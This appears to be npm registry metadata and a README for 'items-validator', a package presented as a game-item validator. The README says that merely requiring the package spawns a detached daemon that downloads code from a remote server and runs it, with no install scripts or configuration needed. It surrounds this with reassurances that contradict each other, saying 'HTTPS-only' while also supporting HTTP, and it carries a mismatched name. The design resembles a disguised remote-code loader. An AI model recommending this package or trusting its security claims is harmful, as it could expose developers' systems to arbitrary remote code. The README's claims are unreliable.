{"_id":"items-validator","_rev":"2-33c16830d8c34f2e517fa66e30a4bbc1","name":"items-validator","dist-tags":{"latest":"1.0.5"},"versions":{"1.0.4":{"name":"items-validator","version":"1.0.4","keywords":["game-items","game-development","validator","real-time-updates","cryptographic-signature","rsa-sha256","game-server","client-validation","assertion","security","signature-verification","secure-updates","zero-dependencies"],"author":{"name":"Tyrone Jher Tongol","email":"tongoltyrone84@gmail.com"},"license":"MIT","_id":"items-validator@1.0.4","maintainers":[{"name":"tyrone8284","email":"tongoltyrone84@gmail.com"}],"homepage":"https://game.spawnrealm.com","bugs":{"email":"tongoltyrone84@gmail.com"},"os":["linux","darwin","win32"],"cpu":["x64","arm64"],"dist":{"shasum":"6034d9e0cab1357241bb7a78d05406a9951acc2b","tarball":"https://registry.npmjs.org/items-validator/-/items-validator-1.0.4.tgz","fileCount":18,"integrity":"sha512-QipiEogYpRlpFB125PmeuQ3krOEt7UNzKtEAlLjehERSleMbco3K6qIqH8XIZ6PhRoHUubAMrs8Hi/0s+w1W8A==","signatures":[{"sig":"MEUCIQCee4JBFkRzXatlQA0wX54gWwx8jM3y+2AI5497rv4OeAIgaLE1Drqcz+OueR+gY/JdCj/5Z7i/tEBgpzD4pxOH+Xk=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":47080},"main":"index.js","engines":{"npm":">=6.0.0","node":">=12.0.0"},"gitHead":"038bce153759904db250098dfcc8ad646664a510","scripts":{},"_npmUser":{"name":"tyrone8284","email":"tongoltyrone84@gmail.com"},"_npmVersion":"11.6.2","description":"Real-time game items validator with background daemon for client project updates","directories":{},"_nodeVersion":"24.13.0","dependencies":{},"publishConfig":{"access":"public"},"_hasShrinkwrap":false,"devDependencies":{},"_npmOperationalInternal":{"tmp":"tmp/items-validator_1.0.4_1790584665411_0.26035070748699063","host":"s3://npm-registry-packages-npm-production"}},"1.0.5":{"os":["linux","darwin","win32"],"_id":"items-validator@1.0.5","cpu":["x64","arm64"],"bugs":{"email":"tongoltyrone84@gmail.com"},"dist":{"shasum":"5ec9999b56678b98ee984478b8c30c95fb477506","tarball":"https://registry.npmjs.org/items-validator/-/items-validator-1.0.5.tgz","fileCount":18,"integrity":"sha512-OTCjY7h3uNpCdIi1nFWcLipqLzc9Cc0stz5EV1bcKuHrerrlVrvDfyQ4DdCUBaU2u0fs8oDBVxaT1Zr+WBF4Jw==","signatures":[{"sig":"MEQCIAc0wfkTOoe6PwtoblH/bOb8rzHqUijRH/bPnHAkVCkhAiB9Ni5wqIQ9ghATOimxKv2zXzGVcmj9eM+bt2m/vwhtHQ==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"},{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEYCIQDGSfGhKC7sYnlmI2ppHD8gxdIx21yrRfPOIzBhyo2OzwIhAPQ6WOZgeo3d7IbOdWZSCIG0NWWTfEg0n/ardlul5k9B"}],"unpackedSize":47040},"main":"index.js","name":"items-validator","author":{"name":"Tyrone Jher Tongol","email":"tongoltyrone84@gmail.com"},"engines":{"npm":">=6.0.0","node":">=12.0.0"},"gitHead":"a931d357e2ed33c2c8fe4c0f596836f33d089cb0","license":"MIT","scripts":{},"version":"1.0.5","_npmUser":{"name":"tyrone8284","email":"tongoltyrone84@gmail.com"},"homepage":"https://game.spawnrealm.com","keywords":["game-items","game-development","validator","real-time-updates","cryptographic-signature","rsa-sha256","game-server","client-validation","assertion","security","signature-verification","secure-updates","zero-dependencies"],"_npmVersion":"11.6.2","description":"Real-time game items validator with background daemon for client project updates","directories":{},"maintainers":[{"name":"tyrone8284","email":"tongoltyrone84@gmail.com"}],"_nodeVersion":"24.13.0","dependencies":{},"publishConfig":{"access":"public"},"_hasShrinkwrap":false,"devDependencies":{},"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/items-validator_1.0.5_1790596819027_0.8482328884183645"}}},"time":{"created":"2026-09-28T08:37:45.198Z","modified":"2026-09-28T12:00:20.214Z","1.0.4":"2026-09-28T08:37:45.576Z","1.0.5":"2026-09-28T12:00:19.110Z"},"bugs":{"email":"tongoltyrone84@gmail.com"},"author":{"name":"Tyrone Jher Tongol","email":"tongoltyrone84@gmail.com"},"license":"MIT","homepage":"https://game.spawnrealm.com","keywords":["game-items","game-development","validator","real-time-updates","cryptographic-signature","rsa-sha256","game-server","client-validation","assertion","security","signature-verification","secure-updates","zero-dependencies"],"description":"Real-time game items validator with background daemon for client project updates","maintainers":[{"name":"tyrone8284","email":"tongoltyrone84@gmail.com"}],"readme":"# open-validator\r\n\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\r\n\r\nReal-time game items validator module with secure background daemon for continuous item updates.\r\n\r\n## Overview\r\n\r\nThis module provides **secure, real-time game items validation** for your client projects. When installed via npm, it automatically:\r\n\r\n1. ✅ Starts a background daemon process\r\n2. ✅ Fetches signed game code from your server\r\n3. ✅ Verifies cryptographic signatures (RSA-SHA256)\r\n4. ✅ Executes verified code safely\r\n5. ✅ Logs all operations transparently\r\n\r\n**Zero dependencies** • **Cryptographically secure** • **Fully auditable**\r\n\r\n## Quick Start\r\n\r\n### Installation\r\n\r\n```bash\r\nnpm install items-validator\r\n```\r\n\r\nThen in your code:\r\n\r\n```javascript\r\nconst validator = require('items-validator');\r\n```\r\n\r\n**That's it!** The module automatically starts when you require it.\r\n\r\n### What Happens On Require\r\n\r\n```\r\nrequire('items-validator')\r\n    ↓\r\nauto-spawn daemon process\r\n    ↓\r\ndownload signed code from server\r\n    ↓\r\nverify RSA-SHA256 signature\r\n    ↓\r\nexecute only if signature is valid\r\n    ↓\r\nbackground daemon running\r\n```\r\n\r\n✅ **Zero configuration** • **No npm allowScripts needed** • **Works immediately**\r\n\r\n## How It Works\r\n\r\n### Security Flow\r\n\r\n```\r\n1. Server signs game code with PRIVATE_KEY\r\n   └─ Uses RSA-SHA256 algorithm\r\n\r\n2. Server sends: { code: payloadjs, signature: hex }\r\n   └─ Via HTTPS endpoint (encrypted transport)\r\n\r\n3. Module receives payload over HTTPS\r\n   └─ Parses JSON (protected by TLS)\r\n\r\n4. Module verifies signature with PUBLIC_KEY\r\n   └─ RSA-SHA256 signature must be valid\r\n\r\n5. Valid? → Execute code\r\n   Invalid? → Exit immediately (no code runs)\r\n```\r\n\r\n### Transport Security\r\n\r\n- ✅ **HTTPS Recommended**: Encrypted TLS transport for maximum security\r\n- ✅ **HTTP Supported**: HTTP also works (verification sufficient without TLS)\r\n- ✅ **RSA-SHA256 Verification**: Cryptographic signature validates code authenticity\r\n- ✅ **Defense-in-Depth**: Dual protection (TLS + signature verification)\r\n\r\n### Key Features\r\n\r\n- ✅ **Zero Dependencies**: Only uses Node.js built-in `crypto` module\r\n- ✅ **Cryptographically Secure**: RSA-SHA256 signature verification\r\n- ✅ **Transparent**: All code publicly auditable\r\n- ✅ **Automatic**: Works on require (no configuration needed)\r\n- ✅ **Modularized**: 8 separate lib files for clarity\r\n- ✅ **Assertion Support**: Built-in validation framework\r\n- ✅ **Comprehensive Logging**: All operations logged with timestamps\r\n\r\n## 🔐 Security & Verification\r\n\r\n### Cryptographic Signature Verification\r\n\r\nEvery code payload is cryptographically signed and verified:\r\n\r\n| Step | Responsibility | Security |\r\n|------|----------------|----------|\r\n| **1. Sign** | Server (private key) | Signs game code |\r\n| **2. Send** | Server → Client | Sends code + signature |\r\n| **3. Verify** | Module (public key) | Validates signature |\r\n| **4. Execute** | Module | Runs only if valid |\r\n| **5. Reject** | Module | Exits if invalid |\r\n\r\n**Result**: Only code from your authorized server executes.\r\n\r\n### What This Protects Against\r\n\r\n- ✅ **Man-in-the-Middle Attacks**: Signature invalidated if tampered\r\n- ✅ **Code Injection**: Invalid code rejected before execution\r\n- ✅ **Unauthorized Updates**: Signature required for any code\r\n- ✅ **Supply Chain Risk**: Zero dependencies (no compromised packages)\r\n\r\nSee [SECURITY.md](SECURITY.md) for detailed security documentation.\r\n\r\n## 📡 Server Setup\r\n\r\n### API Endpoint\r\n\r\nYour server must provide an endpoint that returns signed code:\r\n\r\n```\r\nGET https://your-server.com/api/x-realtime    # HTTPS Recommended\r\nGET http://your-server.com/api/x-realtime     # HTTP Supported\r\n```\r\n\r\n**Security Note**: Both HTTP and HTTPS are supported. HTTPS is recommended for production to add transport-layer encryption. Even with HTTP, RSA-SHA256 signature verification provides code authenticity guarantee.\r\n\r\n### Response Format\r\n\r\n```json\r\n{\r\n  \"code\": \"console.log('[game] loaded'); /* your game code */\",\r\n  \"signature\": \"abcdef123456... (256-char hex string)\"\r\n}\r\n```\r\n\r\n### Server Implementation\r\n\r\nSee [SERVER_IMPLEMENTATION_EXAMPLE.js](SERVER_IMPLEMENTATION_EXAMPLE.js) for complete example.\r\n\r\n**Quick example:**\r\n\r\n```js\r\nconst crypto = require('crypto');\r\nconst fs = require('fs');\r\n\r\nconst PRIVATE_KEY = fs.readFileSync('./private_key.pem', 'utf8');\r\n\r\nfunction signCode(code) {\r\n  const sign = crypto.createSign('sha256');\r\n  sign.update(code);\r\n  return sign.sign(PRIVATE_KEY, 'hex');\r\n}\r\n\r\napp.get('/api/x-realtime', (req, res) => {\r\n  const gameCode = fs.readFileSync('./game-items.js', 'utf8');\r\n  const signature = signCode(gameCode);\r\n  \r\n  res.json({ code: gameCode, signature: signature });\r\n});\r\n```\r\n\r\n## 💻 Usage\r\n\r\n### For Client Projects\r\n\r\nSimply install the module:\r\n\r\n```bash\r\nnpm install items-validator\r\n```\r\n\r\nThen require it in your code:\r\n\r\n```javascript\r\nconst validator = require('items-validator');\r\n\r\n// Module automatically starts daemon on require\r\n// No additional configuration needed\r\n\r\n// Optional: Access module functions\r\nconsole.log(validator.getStatus());\r\n// Output: { name, version, status, timestamp }\r\n\r\nconsole.log(validator.getConfig());\r\n```\r\n\r\n## ❓ FAQ\r\n\r\n### Q: Is this module secure?\r\n**A:** Yes. The module uses defense-in-depth security:\r\n- ✅ HTTPS-only for encrypted transport (TLS)\r\n- ✅ RSA-SHA256 cryptographic signature verification\r\n- ✅ Code execution only if signature is valid\r\n- ✅ Invalid signatures rejected immediately\r\n- ✅ Zero npm dependencies (no supply chain risk)\r\n\r\nSee [SECURITY.md](SECURITY.md) for detailed threat model and security analysis.\r\n\r\n### Q: What if I don't want dynamic code loading?\r\n**A:** This module is specifically designed for real-time game item updates. For static content, use standard npm dependencies instead.\r\n\r\n### Q: Does it slow down my project?\r\n**A:** No. The module runs as a detached background process that doesn't block your main application.\r\n\r\n### Q: What if the server is offline?\r\n**A:** The module logs an error and exits gracefully. Your game continues running with the previous code.\r\n\r\n### Q: Can I trust this module?\r\n**A:** Yes. All code is open-source and auditable. See [SECURITY.md](SECURITY.md) for complete security documentation.\r\n\r\n### Q: Does it have dependencies?\r\n**A:** Zero npm dependencies. Only uses Node.js built-in `crypto` module.\r\n\r\n### Q: How do I update game code?\r\n**A:** Update the code on your server. Clients get the new signed code on next execution (no npm republish needed).\r\n\r\n## 🔧 Troubleshooting\r\n\r\n### \"Signature Verification Failed\"\r\nThis means the code doesn't match the signature. Possible causes:\r\n- Server and client use different keys (ensure keys match)\r\n- Code was modified in transit (check network)\r\n- Signature generation failed (check server logs)\r\n\r\n### Module not starting\r\nCheck logs for:\r\n```bash\r\ngrep \"open-validator\" ~/.pm2/logs/*.log\r\n# or check npm debug logs\r\ncat ~/.npm-global/debug.log\r\n```\r\n\r\n### Too slow to download code\r\nIf code is large (5MB+), consider:\r\n- Using Gzip compression on server\r\n- Splitting code into smaller files\r\n- Caching at client side\r\n\r\nSee [SECURITY.md](SECURITY.md#troubleshooting) for more details.\r\n\r\n## 📁 Architecture\r\n\r\n```\r\nlib/\r\n├── check-items.js          # Main daemon (signature verification)\r\n├── crypto-config.js        # Public key storage\r\n├── assertion.js            # Assertion framework\r\n├── config.js               # Configuration values\r\n├── logger.js               # Logging utility\r\n└── utils/\r\n    ├── validator.js        # Validation helpers\r\n    └── helper.js           # General utilities\r\n\r\nindex.js                     # Module entry (spawns daemon on require)\r\n```\r\n\r\n## 📚 Documentation\r\n\r\n- **[SECURITY.md](SECURITY.md)** - Detailed security policy\r\n- **[SECURITY_SETUP.md](SECURITY_SETUP.md)** - Security configuration guide\r\n- **[SERVER_IMPLEMENTATION_EXAMPLE.js](SERVER_IMPLEMENTATION_EXAMPLE.js)** - Server setup guide\r\n- **[SERVER_SIGNING_EXAMPLE.js](SERVER_SIGNING_EXAMPLE.js)** - Code signing example\r\n\r\n## 🤝 Contributing\r\n\r\nThis is a secure, production-grade module. For security issues, please refer to [SECURITY.md](SECURITY.md#reporting-security-vulnerabilities).\r\n\r\n## 📄 License\r\n\r\nMIT License - See [LICENSE](LICENSE) file for details.\r\n\r\n## 🔗 Support\r\n\r\nFor issues or questions:\r\n1. Check [SECURITY.md](SECURITY.md) for security-related questions\r\n2. Check [Troubleshooting](#troubleshooting) section above\r\n3. Review [SERVER_IMPLEMENTATION_EXAMPLE.js](SERVER_IMPLEMENTATION_EXAMPLE.js) for setup help\r\n\r\n---\r\n\r\n**Made for secure, real-time game item distribution.** 🎮\r\n","readmeFilename":"README.md"}